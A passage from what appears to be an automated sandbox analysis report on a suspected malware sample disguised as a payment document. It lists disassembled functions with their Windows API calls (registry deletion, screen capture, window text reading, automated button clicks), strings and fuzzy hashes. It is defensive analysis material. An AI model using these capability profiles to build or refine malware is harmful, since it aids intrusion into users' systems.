SysFreeString.OLEAUT32(?), ref: 0095178C
VariantClear.OLEAUT32(?), ref: 009517D8
VariantClear.OLEAUT32(?), ref: 009517E7
VariantInit.OLEAUT32(00000000), ref: 00951823

Strings

%4d%02d%02d%02d%02d%02d, xrefs: 00951625
Default, xrefs: 009516AF

Memory Dump Source

Source File: 00000000.00000002.1706394141.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true

Associated: 00000000.00000002.1706369843.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706482310.000000000097C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706482310.00000000009A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706541080.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706561424.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8e0000_Payment Notification Confirmation Documents 09_01_2025 Paper bill.jbxd

Similarity

API ID: Variant$ClearInit$Time$CopyFreeFromStringSystem
String ID: %4d%02d%02d%02d%02d%02d$Default
API String ID: 1234038744-3931177956
Opcode ID: 09d3138831771ab66d2aabf4dac91a1995d1302c90600632308658bcbc0ddc68
Instruction ID: b152dc8c1091713c57926e449b77d4a2dd89149fd8e40cd967d8a78a79f56c55
Opcode Fuzzy Hash: 09d3138831771ab66d2aabf4dac91a1995d1302c90600632308658bcbc0ddc68
Instruction Fuzzy Hash: A6D10172A00105DBCB00EF6AD885B7DB7B9FF45701F10845AF946AB191EB38DC4ADB62

Function 0096B60E Relevance: 21.3, APIs: 10, Strings: 2, Instructions: 285registrylibraryloaderCOMMON

Download Yara Rule

APIs

Part of subcall function 008E9CB3: _wcslen.LIBCMT ref: 008E9CBD

Part of subcall function 0096C998: CharUpperBuffW.USER32(?,?,?,?,?,?,?,0096B6AE,?,?), ref: 0096C9B5
Part of subcall function 0096C998: _wcslen.LIBCMT ref: 0096C9F1
Part of subcall function 0096C998: _wcslen.LIBCMT ref: 0096CA68
Part of subcall function 0096C998: _wcslen.LIBCMT ref: 0096CA9E

RegConnectRegistryW.ADVAPI32(?,?,?), ref: 0096B6F4
RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 0096B772
RegDeleteValueW.ADVAPI32(?,?), ref: 0096B80A
RegCloseKey.ADVAPI32(?), ref: 0096B87E
RegCloseKey.ADVAPI32(?), ref: 0096B89C
LoadLibraryA.KERNEL32(advapi32.dll), ref: 0096B8F2
GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW), ref: 0096B904
RegDeleteKeyW.ADVAPI32(?,?), ref: 0096B922
FreeLibrary.KERNEL32(00000000), ref: 0096B983
RegCloseKey.ADVAPI32(00000000), ref: 0096B994

Strings

RegDeleteKeyExW, xrefs: 0096B8FE
advapi32.dll, xrefs: 0096B8ED

Memory Dump Source

Source File: 00000000.00000002.1706394141.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true

Associated: 00000000.00000002.1706369843.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706482310.000000000097C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706482310.00000000009A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706541080.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706561424.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8e0000_Payment Notification Confirmation Documents 09_01_2025 Paper bill.jbxd

Similarity

API ID: _wcslen$Close$DeleteLibrary$AddressBuffCharConnectFreeLoadOpenProcRegistryUpperValue
String ID: RegDeleteKeyExW$advapi32.dll
API String ID: 146587525-4033151799
Opcode ID: 611a915585bf49f1c1ea38344ab9e6a4196da99b6a72568945e3393da7835024
Instruction ID: c2b46c21e2ffdfd8621b3e5293ba174f24ac51e878cad8e046fccbb1aa00a534
Opcode Fuzzy Hash: 611a915585bf49f1c1ea38344ab9e6a4196da99b6a72568945e3393da7835024
Instruction Fuzzy Hash: 24C19D31208241AFD714DF18C495F2ABBE5FF85308F14845CF4AA8B2A2DB75ED85CB92

Function 0096255C Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 169windowCOMMON

Download Yara Rule

APIs

GetDC.USER32(00000000), ref: 009625D8
CreateCompatibleBitmap.GDI32(00000000,?,?), ref: 009625E8
CreateCompatibleDC.GDI32(?), ref: 009625F4
SelectObject.GDI32(00000000,?), ref: 00962601
StretchBlt.GDI32(?,00000000,00000000,?,?,?,00000006,?,?,?,00CC0020), ref: 0096266D
GetDIBits.GDI32(?,?,00000000,00000000,00000000,00000028,00000000), ref: 009626AC
GetDIBits.GDI32(?,?,00000000,?,00000000,00000028,00000000), ref: 009626D0
SelectObject.GDI32(?,?), ref: 009626D8
DeleteObject.GDI32(?), ref: 009626E1
DeleteDC.GDI32(?), ref: 009626E8
ReleaseDC.USER32(00000000,?), ref: 009626F3

Strings

(, xrefs: 0096268D

Memory Dump Source

Source File: 00000000.00000002.1706394141.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true

Associated: 00000000.00000002.1706369843.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706482310.000000000097C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706482310.00000000009A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706541080.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706561424.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8e0000_Payment Notification Confirmation Documents 09_01_2025 Paper bill.jbxd

Similarity

API ID: Object$BitsCompatibleCreateDeleteSelect$BitmapReleaseStretch
String ID: (
API String ID: 2598888154-3887548279
Opcode ID: e73b8247008849bed771c93f804645a0aec80599d4a53318b5cddef261d74284
Instruction ID: 3fc30eaa3319263ee663a4941c1dd2d8a2712dfdd6eeb3657ae414fd859fbbe3
Opcode Fuzzy Hash: e73b8247008849bed771c93f804645a0aec80599d4a53318b5cddef261d74284
Instruction Fuzzy Hash: 5761E5B6D04219EFCF14CFA4D884EAEBBB5FF48310F20852AE559A7250D774A941DF50

Function 0091DA5D Relevance: 19.6, APIs: 13, Instructions: 114COMMONLIBRARYCODE

Download Yara Rule

APIs

___free_lconv_mon.LIBCMT ref: 0091DAA1

Part of subcall function 0091D63C: _free.LIBCMT ref: 0091D659
Part of subcall function 0091D63C: _free.LIBCMT ref: 0091D66B
Part of subcall function 0091D63C: _free.LIBCMT ref: 0091D67D
Part of subcall function 0091D63C: _free.LIBCMT ref: 0091D68F
Part of subcall function 0091D63C: _free.LIBCMT ref: 0091D6A1
Part of subcall function 0091D63C: _free.LIBCMT ref: 0091D6B3
Part of subcall function 0091D63C: _free.LIBCMT ref: 0091D6C5
Part of subcall function 0091D63C: _free.LIBCMT ref: 0091D6D7
Part of subcall function 0091D63C: _free.LIBCMT ref: 0091D6E9
Part of subcall function 0091D63C: _free.LIBCMT ref: 0091D6FB
Part of subcall function 0091D63C: _free.LIBCMT ref: 0091D70D
Part of subcall function 0091D63C: _free.LIBCMT ref: 0091D71F
Part of subcall function 0091D63C: _free.LIBCMT ref: 0091D731

_free.LIBCMT ref: 0091DA96

Part of subcall function 009129C8: RtlFreeHeap.NTDLL(00000000,00000000,?,0091D7D1,00000000,00000000,00000000,00000000,?,0091D7F8,00000000,00000007,00000000,?,0091DBF5,00000000), ref: 009129DE
Part of subcall function 009129C8: GetLastError.KERNEL32(00000000,?,0091D7D1,00000000,00000000,00000000,00000000,?,0091D7F8,00000000,00000007,00000000,?,0091DBF5,00000000,00000000), ref: 009129F0

_free.LIBCMT ref: 0091DAB8
_free.LIBCMT ref: 0091DACD
_free.LIBCMT ref: 0091DAD8
_free.LIBCMT ref: 0091DAFA
_free.LIBCMT ref: 0091DB0D
_free.LIBCMT ref: 0091DB1B
_free.LIBCMT ref: 0091DB26
_free.LIBCMT ref: 0091DB5E
_free.LIBCMT ref: 0091DB65
_free.LIBCMT ref: 0091DB82
_free.LIBCMT ref: 0091DB9A

Memory Dump Source

Source File: 00000000.00000002.1706394141.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true

Associated: 00000000.00000002.1706369843.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706482310.000000000097C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706482310.00000000009A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706541080.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706561424.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8e0000_Payment Notification Confirmation Documents 09_01_2025 Paper bill.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast___free_lconv_mon
String ID:
API String ID: 161543041-0
Opcode ID: 4915e38842f4ccd9ead14123139cd936ef954cef22be7a9a5cda37a2438848dd
Instruction ID: 94428ffdfa8a039cd704d524d4a025e8651597409198319eb0af3758bcb051f5
Opcode Fuzzy Hash: 4915e38842f4ccd9ead14123139cd936ef954cef22be7a9a5cda37a2438848dd
Instruction Fuzzy Hash: 7B3148327496089FEB22AB39E945B9A77ECFF40320F114419E459DB191DB34ACE08720

Function 0094365B Relevance: 19.5, APIs: 10, Strings: 1, Instructions: 267windowtimeCOMMON

Download Yara Rule

APIs

GetClassNameW.USER32(?,?,00000100), ref: 0094369C
_wcslen.LIBCMT ref: 009436A7
SendMessageTimeoutW.USER32(?,?,00000101,00000000,00000002,00001388,?), ref: 00943797
GetClassNameW.USER32(?,?,00000400), ref: 0094380C
GetDlgCtrlID.USER32(?), ref: 0094385D
GetWindowRect.USER32(?,?), ref: 00943882
GetParent.USER32(?), ref: 009438A0
ScreenToClient.USER32(00000000), ref: 009438A7
GetClassNameW.USER32(?,?,00000100), ref: 00943921
GetWindowTextW.USER32(?,?,00000400), ref: 0094395D

Strings

%s%u, xrefs: 00943734

Memory Dump Source

Source File: 00000000.00000002.1706394141.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true

Associated: 00000000.00000002.1706369843.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706482310.000000000097C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706482310.00000000009A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706541080.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706561424.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8e0000_Payment Notification Confirmation Documents 09_01_2025 Paper bill.jbxd

Similarity

API ID: ClassName$Window$ClientCtrlMessageParentRectScreenSendTextTimeout_wcslen
String ID: %s%u
API String ID: 4010501982-679674701
Opcode ID: 1e5189f17835b0bbe99a21d7cb9183287af3bb3e010bbfac520e13ee5b4e8981
Instruction ID: 986f6c1a87775f72c34eab17d503b611bab44fb9a30ac773821e170bd0345620
Opcode Fuzzy Hash: 1e5189f17835b0bbe99a21d7cb9183287af3bb3e010bbfac520e13ee5b4e8981
Instruction Fuzzy Hash: 2B919E71204606EFD719DF34C885FAAF7A8FF44354F108629FAA9D2190DB30EA55CB91

Function 00944954 Relevance: 19.5, APIs: 10, Strings: 1, Instructions: 253COMMON

Download Yara Rule

APIs

GetClassNameW.USER32(?,?,00000400), ref: 00944994
GetWindowTextW.USER32(?,?,00000400), ref: 009449DA
_wcslen.LIBCMT ref: 009449EB
CharUpperBuffW.USER32(?,00000000), ref: 009449F7
_wcsstr.LIBVCRUNTIME ref: 00944A2C
GetClassNameW.USER32(00000018,?,00000400), ref: 00944A64
GetWindowTextW.USER32(?,?,00000400), ref: 00944A9D
GetClassNameW.USER32(00000018,?,00000400), ref: 00944AE6
GetClassNameW.USER32(?,?,00000400), ref: 00944B20
GetWindowRect.USER32(?,?), ref: 00944B8B

Strings

ThumbnailClass, xrefs: 00944A6F, 00944AF1

Memory Dump Source

Source File: 00000000.00000002.1706394141.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true

Associated: 00000000.00000002.1706369843.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706482310.000000000097C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706482310.00000000009A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706541080.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706561424.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8e0000_Payment Notification Confirmation Documents 09_01_2025 Paper bill.jbxd

Similarity

API ID: ClassName$Window$Text$BuffCharRectUpper_wcslen_wcsstr
String ID: ThumbnailClass
API String ID: 1311036022-1241985126
Opcode ID: dc70a5453924ae65d7e22ca1691f09ae56464f0e0b5cb7be94ee248143a7fda3
Instruction ID: c64f8a5aeb20ee0950c40880989e5e6efd00fe04620a617f1dc2679ef3bf7274
Opcode Fuzzy Hash: dc70a5453924ae65d7e22ca1691f09ae56464f0e0b5cb7be94ee248143a7fda3
Instruction Fuzzy Hash: CB91C0721082069FDB04DF14C985FAA77ECFF84718F048469FD899A196EB34ED45CBA1

Function 0096CC34 Relevance: 19.4, APIs: 9, Strings: 2, Instructions: 104registryCOMMON

Download Yara Rule

APIs

RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?,?,?,00000000), ref: 0096CC64
RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?,?,?,00000000), ref: 0096CC8D
FreeLibrary.KERNEL32(00000000,?,?,00000000), ref: 0096CD48

Part of subcall function 0096CC34: RegCloseKey.ADVAPI32(?,?,?,00000000), ref: 0096CCAA
Part of subcall function 0096CC34: LoadLibraryA.KERNEL32(advapi32.dll,?,?,00000000), ref: 0096CCBD
Part of subcall function 0096CC34: GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW), ref: 0096CCCF
Part of subcall function 0096CC34: FreeLibrary.KERNEL32(00000000,?,?,00000000), ref: 0096CD05
Part of subcall function 0096CC34: RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?,?,?,00000000), ref: 0096CD28

RegDeleteKeyW.ADVAPI32(?,?), ref: 0096CCF3

Strings

RegDeleteKeyExW, xrefs: 0096CCC9
advapi32.dll, xrefs: 0096CCB8

Memory Dump Source

Source File: 00000000.00000002.1706394141.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true

Associated: 00000000.00000002.1706369843.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706482310.000000000097C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706482310.00000000009A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706541080.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706561424.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8e0000_Payment Notification Confirmation Documents 09_01_2025 Paper bill.jbxd

Similarity

API ID: Library$EnumFree$AddressCloseDeleteLoadOpenProc
String ID: RegDeleteKeyExW$advapi32.dll
API String ID: 2734957052-4033151799
Opcode ID: 4c64c040c2f6c7be447a2d41e40566cc756e73ae7573645d9a75d38689e86e2e
Instruction ID: b6c26cd151d34971a451b29fcd88e802ee4a6a9d4e54d9f148802766501ba91c
Opcode Fuzzy Hash: 4c64c040c2f6c7be447a2d41e40566cc756e73ae7573645d9a75d38689e86e2e
Instruction Fuzzy Hash: 153160F2905129BBDB209B54DC88EFFBB7CEF46750F000569B949E2240D7349A85EAE0

Function 00953D1E Relevance: 19.4, APIs: 8, Strings: 3, Instructions: 101fileCOMMON

Download Yara Rule

APIs

GetFullPathNameW.KERNEL32(?,00007FFF,?,?), ref: 00953D40
_wcslen.LIBCMT ref: 00953D6D
CreateDirectoryW.KERNEL32(?,00000000), ref: 00953D9D
CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000003,02200000,00000000), ref: 00953DBE
RemoveDirectoryW.KERNEL32(?), ref: 00953DCE
DeviceIoControl.KERNEL32(00000000,000900A4,?,?,00000000,00000000,?,00000000), ref: 00953E55
CloseHandle.KERNEL32(00000000), ref: 00953E60
CloseHandle.KERNEL32(00000000), ref: 00953E6B

Strings

:, xrefs: 00953D82
\, xrefs: 00953D77
\??\%s, xrefs: 00953D5B

Memory Dump Source

Source File: 00000000.00000002.1706394141.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true

Associated: 00000000.00000002.1706369843.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706482310.000000000097C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706482310.00000000009A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706541080.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706561424.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8e0000_Payment Notification Confirmation Documents 09_01_2025 Paper bill.jbxd

Similarity

API ID: CloseCreateDirectoryHandle$ControlDeviceFileFullNamePathRemove_wcslen
String ID: :$\$\??\%s
API String ID: 1149970189-3457252023
Opcode ID: 098b22f55e17ede506b6a0d7e29ad7074642492b5e6fb84e21ed746c080c5513
Instruction ID: 5aed6c5efbbecf344659a74dec9bd93c00bce16c80197a191810a7901309da71
Opcode Fuzzy Hash: 098b22f55e17ede506b6a0d7e29ad7074642492b5e6fb84e21ed746c080c5513
Instruction Fuzzy Hash: 2A31B6B2514109ABDB21DBA1DC49FEF37BCEF88741F1040B9FA19D6091E77497888B24

Function 0094E6B0 Relevance: 19.3, APIs: 10, Strings: 1, Instructions: 72sleepwindowtimeCOMMON

Download Yara Rule

APIs

timeGetTime.WINMM ref: 0094E6B4

Part of subcall function 008FE551: timeGetTime.WINMM(?,?,0094E6D4), ref: 008FE555

Sleep.KERNEL32(0000000A), ref: 0094E6E1
EnumThreadWindows.USER32(?,Function_0006E665,00000000), ref: 0094E705
FindWindowExW.USER32(00000000,00000000,BUTTON,00000000), ref: 0094E727
SetActiveWindow.USER32 ref: 0094E746
SendMessageW.USER32(00000000,000000F5,00000000,00000000), ref: 0094E754
SendMessageW.USER32(00000010,00000000,00000000), ref: 0094E773
Sleep.KERNEL32(000000FA), ref: 0094E77E
IsWindow.USER32 ref: 0094E78A
EndDialog.USER32(00000000), ref: 0094E79B

Strings

BUTTON, xrefs: 0094E719

Memory Dump Source

Source File: 00000000.00000002.1706394141.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true

Associated: 00000000.00000002.1706369843.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706482310.000000000097C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706482310.00000000009A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706541080.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706561424.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8e0000_Payment Notification Confirmation Documents 09_01_2025 Paper bill.jbxd

Similarity

API ID: Window$MessageSendSleepTimetime$ActiveDialogEnumFindThreadWindows
String ID: BUTTON
API String ID: 1194449130-3405671355
Opcode ID: 7e9b9c98d4cbb91d5a4859cddb77fde67ab91574368e33127df6bcf35dfb3c3f
Instruction ID: c0b8ffdd1d808f272a08698bfda3a06d792c96c8ff6b2b8cbba9175bf6f578d0
Opcode Fuzzy Hash: 7e9b9c98d4cbb91d5a4859cddb77fde67ab91574368e33127df6bcf35dfb3c3f
Instruction Fuzzy Hash: 322181B1628205EFEB005F30EDCAE293B6DF7543A9F101629F50AC11A1DB71AC40AB24

Function 0094E9FC Relevance: 19.3, APIs: 5, Strings: 6, Instructions: 71COMMON

Download Yara Rule

APIs

Part of subcall function 008E9CB3: _wcslen.LIBCMT ref: 008E9CBD

mciSendStringW.WINMM(status PlayMe mode,?,00000100,00000000), ref: 0094EA5D
mciSendStringW.WINMM(close PlayMe,00000000,00000000,00000000), ref: 0094EA73
mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0094EA84
mciSendStringW.WINMM(play PlayMe wait,00000000,00000000,00000000), ref: 0094EA96
mciSendStringW.WINMM(play PlayMe,00000000,00000000,00000000), ref: 0094EAA7

Strings

play PlayMe wait, xrefs: 0094EA91
play PlayMe, xrefs: 0094EAA2
alias PlayMe, xrefs: 0094EA36
open , xrefs: 0094EA0C
status PlayMe mode, xrefs: 0094EA58
close PlayMe, xrefs: 0094EA6E, 0094EA9B

Memory Dump Source

Source File: 00000000.00000002.1706394141.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true

Associated: 00000000.00000002.1706369843.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706482310.000000000097C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706482310.00000000009A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706541080.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706561424.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8e0000_Payment Notification Confirmation Documents 09_01_2025 Paper bill.jbxd

Similarity

API ID: SendString$_wcslen
String ID: alias PlayMe$close PlayMe$open $play PlayMe$play PlayMe wait$status PlayMe mode
API String ID: 2420728520-1007645807
Opcode ID: 043f79818e9c98d63e5a88e97fd83c560569bf7e769d729527761e234737edc9
Instruction ID: e76476e3c7695be19f75f0553d4933ac11448698a52cc9ae1564c16b8ddc9e41
Opcode Fuzzy Hash: 043f79818e9c98d63e5a88e97fd83c560569bf7e769d729527761e234737edc9
Instruction Fuzzy Hash: B0117C31A9026979D720E7AADC4AEFF6A7CFBD3B04F440529B811E20D1EEB04E45C5B1

Function 00945CC6 Relevance: 18.2, APIs: 12, Instructions: 173COMMON

Download Yara Rule

APIs

GetDlgItem.USER32(?,00000001), ref: 00945CE2
GetWindowRect.USER32(00000000,?), ref: 00945CFB
MoveWindow.USER32(?,0000000A,00000004,?,?,00000004,00000000), ref: 00945D59
GetDlgItem.USER32(?,00000002), ref: 00945D69
GetWindowRect.USER32(00000000,?), ref: 00945D7B
MoveWindow.USER32(?,?,00000004,00000000,?,00000004,00000000), ref: 00945DCF
GetDlgItem.USER32(?,000003E9), ref: 00945DDD
GetWindowRect.USER32(00000000,?), ref: 00945DEF
MoveWindow.USER32(?,0000000A,00000000,?,00000004,00000000), ref: 00945E31
GetDlgItem.USER32(?,000003EA), ref: 00945E44
MoveWindow.USER32(00000000,0000000A,0000000A,?,-00000005,00000000), ref: 00945E5A
InvalidateRect.USER32(?,00000000,00000001), ref: 00945E67

Memory Dump Source

Source File: 00000000.00000002.1706394141.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true

Associated: 00000000.00000002.1706369843.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706482310.000000000097C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706482310.00000000009A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706541080.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706561424.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8e0000_Payment Notification Confirmation Documents 09_01_2025 Paper bill.jbxd

Similarity

API ID: Window$ItemMoveRect$Invalidate
String ID:
API String ID: 3096461208-0
Opcode ID: 75bfd57fa839b2f69140c08764ec5d5486116252dd3ded27de944d5fc3348555
Instruction ID: 084a5013aeef9a215409fb25306542df28fb02561ff8d0ba038f72718744f5a4
Opcode Fuzzy Hash: 75bfd57fa839b2f69140c08764ec5d5486116252dd3ded27de944d5fc3348555
Instruction Fuzzy Hash: 47511CB1B10605AFDF18CFA8CD89EAEBBB9EF48300F158129F519E6291D7709E40CB50

Function 008F8BCD Relevance: 18.2, APIs: 12, Instructions: 168timeCOMMON

Download Yara Rule

APIs

Part of subcall function 008F8F62: InvalidateRect.USER32(?,00000000,00000001,?,?,?,008F8BE8,?,00000000,?,?,?,?,008F8BBA,00000000,?), ref: 008F8FC5

DestroyWindow.USER32(?), ref: 008F8C81
KillTimer.USER32(00000000,?,?,?,?,008F8BBA,00000000,?), ref: 008F8D1B
DestroyAcceleratorTable.USER32(00000000), ref: 00936973
ImageList_Destroy.COMCTL32(00000000,?,?,?,?,?,?,00000000,?,?,?,?,008F8BBA,00000000,?), ref: 009369A1
ImageList_Destroy.COMCTL32(?,?,?,?,?,?,?,00000000,?,?,?,?,008F8BBA,00000000,?), ref: 009369B8
ImageList_Destroy.COMCTL32(00000000,?,?,?,?,?,?,?,?,00000000,?,?,?,?,008F8BBA,00000000), ref: 009369D4
DeleteObject.GDI32(00000000), ref: 009369E6

Memory Dump Source

Source File: 00000000.00000002.1706394141.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true

Associated: 00000000.00000002.1706369843.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706482310.000000000097C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706482310.00000000009A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706541080.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706561424.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8e0000_Payment Notification Confirmation Documents 09_01_2025 Paper bill.jbxd

Similarity

API ID: Destroy$ImageList_$AcceleratorDeleteInvalidateKillObjectRectTableTimerWindow
String ID:
API String ID: 641708696-0
Opcode ID: e27906e6c93971089fba99e398e331b3b30203b4dcd244874499ecd760abb73a
Instruction ID: 5d03fcb7329f4eb67286c8164605462304129fbb53de85977e7c491df9ea1612
Opcode Fuzzy Hash: e27906e6c93971089fba99e398e331b3b30203b4dcd244874499ecd760abb73a
Instruction Fuzzy Hash: 0B619931116608EFDB259F28DA58B3977F1FB40326F54861CE286DB960CB31A990EF90

Function 008F9838 Relevance: 18.1, APIs: 12, Instructions: 137COMMON

Download Yara Rule

APIs

Part of subcall function 008F9944: GetWindowLongW.USER32(?,000000EB), ref: 008F9952

GetSysColor.USER32(0000000F), ref: 008F9862

Memory Dump Source

Source File: 00000000.00000002.1706394141.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true

Associated: 00000000.00000002.1706369843.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706482310.000000000097C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706482310.00000000009A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706541080.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706561424.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8e0000_Payment Notification Confirmation Documents 09_01_2025 Paper bill.jbxd

Similarity

API ID: ColorLongWindow
String ID:
API String ID: 259745315-0
Opcode ID: 6e2dee6afde7818651c8bb1594d138afdc202bdd58c66af49f5c85f2a2c964b9
Instruction ID: 5a739a74acb6ce7ac054bcbb7a0b1e57ca495185fd0d1f3186441805e81d3fe5
Opcode Fuzzy Hash: 6e2dee6afde7818651c8bb1594d138afdc202bdd58c66af49f5c85f2a2c964b9
Instruction Fuzzy Hash: A041AF71118648AFDB305F389C88BB93BA9FB46370F144629FAE6C71E1C7319981EB11

Function 009496E2 Relevance: 17.6, APIs: 5, Strings: 5, Instructions: 137windowCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(00000000,?,00000FFF,00000001,00000000,?,?,0092F7F8,00000001,0000138C,00000001,?,00000001,00000000,?,?), ref: 00949717
LoadStringW.USER32(00000000,?,0092F7F8,00000001), ref: 00949720

Part of subcall function 008E9CB3: _wcslen.LIBCMT ref: 008E9CBD

GetModuleHandleW.KERNEL32(00000000,00000001,?,00000FFF,?,?,0092F7F8,00000001,0000138C,00000001,?,00000001,00000000,?,?,00000000), ref: 00949742
